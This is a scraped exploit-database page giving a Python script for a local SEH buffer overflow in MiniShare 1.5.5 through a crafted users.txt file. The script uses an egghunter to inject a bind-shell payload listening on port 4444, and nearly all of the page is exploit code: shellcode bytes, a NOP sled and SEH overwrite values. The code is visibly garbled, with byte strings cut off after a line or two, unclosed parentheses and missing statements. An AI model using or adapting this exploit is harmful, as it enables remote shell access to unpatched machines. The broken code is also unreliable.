MiniShare 1.5.5 – ‘users.txt’ Local Buffer Overflow (Egghunter)

  • 作者: 0v3r
    日期: 2010-11-19
  • 类别:
  • 来源:
  • # Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
    # Date: 11/19/2010
    # Author: 0v3r
    # Bug Found By: Chris Gabriel
    # Software Link:
    # Version: 1.5.5
    # Tested on: Windows XP SP3 EN
    # CVE: N/A
    # Just rewrote the exploit using egghunter to inject a bind shell payload 
    # Bug found by Chris Gabriel credit goes to him
    # To exploit just place the users.txt file in the Minishare root directory and run minishare.exe
    egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
    "\x77\x30\x30\x74" # EGG w00t
    # win32_bind -EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 
    shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    nops = "\x90" * (386 - len(egghunter))
    morenops = "\x90" * 32 # need enough NOPs to overwrite the first instance of the egg
    seh= "\xE7\x13\x40\x00"# POP POP RET
    nseh = "\xeb\xc0\x90\x90"# short jump 64 bytes
    egg= "w00tw00t"# the key the egghunter looks for
    buff = nops+ egghunter+nseh + seh+ morenops + egg + shellcode
    #[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]
     	f = open("users.txt",'w')
    	print "\n"	
    	print "\t---------------------------------------------------------------------------------"
    	print "\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
    	print "\t---------------------------------------------------------------------------------"
    	print "\n"
    	print "\t- File 'users.txt' created..."
    	print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n" 
    	print "\t-Oooops! Can't write file 'users.txt'...\n"